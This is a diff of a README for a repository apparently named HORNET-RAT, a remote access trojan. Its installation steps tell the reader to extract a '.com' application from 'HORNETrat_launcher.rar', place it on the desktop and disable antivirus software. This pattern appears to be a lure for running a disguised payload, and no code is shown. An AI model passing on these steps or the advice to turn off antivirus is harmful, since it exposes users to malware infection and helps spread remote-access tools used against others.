queentessaru/HORNET-RAT/README.md

 ### Installation Instructions:

  1. Download the program from the GitHub repository.
- 2. Locate and download the “fff.rar” file.
- 3. Extract the application from the “fff.rar” file.
+ 2. Extract the application from the “HORNETrat_launcher.rar” file.
- 4. Place the extracted application on your desktop.
+ 3. Place the extracted .com application on your desktop.

 ## Note: • Ensure that your antivirus software is disabled while using the program for seamless operation.